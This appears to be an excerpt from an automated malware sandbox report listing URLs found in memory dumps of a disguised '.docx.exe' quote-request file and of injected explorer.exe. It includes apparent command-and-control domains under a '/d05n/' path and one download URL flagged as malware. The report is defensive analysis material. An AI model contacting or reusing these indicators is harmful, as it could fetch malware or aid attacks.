                                                                          http://www.ynapticshiftai.tech/d05n/explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.ursing-caregiver-jobs-za-3.bond/d05n/www.trl-migrate.onlineexplorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://mbsngradnja.com:80/244_Rgzwnbqrkpn#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1781016526.00000000005C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: malware
                                                                            		unknown
                                                                            http://www.9838.xyzexplorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.egakids.shop/d05n/www.ental-implants-50062.bondexplorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://android.notify.windows.com/iOSexplorer.exe, 00000006.00000000.1808128757.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.egakids.shopexplorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://www.eanliving.site/d05n/explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000006.00000000.1790982592.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.9838.xyz/d05n/explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://outlook.com_explorer.exe, 00000006.00000002.4178769883.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1808128757.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.pmail.com#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1699986277.0000000002805000.00000004.00000020.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1700194533.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1831855062.000000007FC4F000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1782270171.0000000002806000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.ursing-caregiver-jobs-za-3.bondexplorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://ocsp.sectigo.com0C#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.ynapticshiftai.techReferer:explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://mbsngradnja.com/244_Rgzwnbqrkpnb:$#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1781016526.00000000005B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://mbsngradnja.com/244_Rgzwnbqrkpn4W#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1781016526.000000000057F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://ocsp.sectigo.com0#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.atingdilse.siteReferer:explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://www.ynthia-mcc-lin-tick.linkReferer:explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://www.ybzert.onlineReferer:explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://www.ynthia-mcc-lin-tick.link/d05n/www.atingdilse.siteexplorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000006.00000002.4172505215.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://powerpoint.office.comcemberexplorer.exe, 00000006.00000002.4178769883.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1808128757.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.egos.design/d05n/explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    http://www.egakids.shop/d05n/explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.atingdilse.site/d05n/explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0##U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://schemas.microexplorer.exe, 00000006.00000000.1792661792.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1803231829.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1794996906.0000000008720000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.joops.music/d05n/www.upta.bioexplorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://www.9838.xyz/d05n/www.ybzert.onlineexplorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://www.eanliving.siteReferer:explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://www.ynthia-mcc-lin-tick.link/d05n/explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://www.apaescortatings.xyzReferer:explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.egos.designexplorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://www.xc31.topexplorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://www.upta.bio/d05n/explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://www.ynapticshiftai.techexplorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://api.msn.com/qexplorer.exe, 00000006.00000003.3107012452.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1799656853.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4174806858.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://www.apaescortatings.xyz/d05n/www.ynthia-mcc-lin-tick.linkexplorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    http://www.ybzert.online/d05n/www.ynapticshiftai.techexplorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    http://www.apaescortatings.xyzexplorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        		high
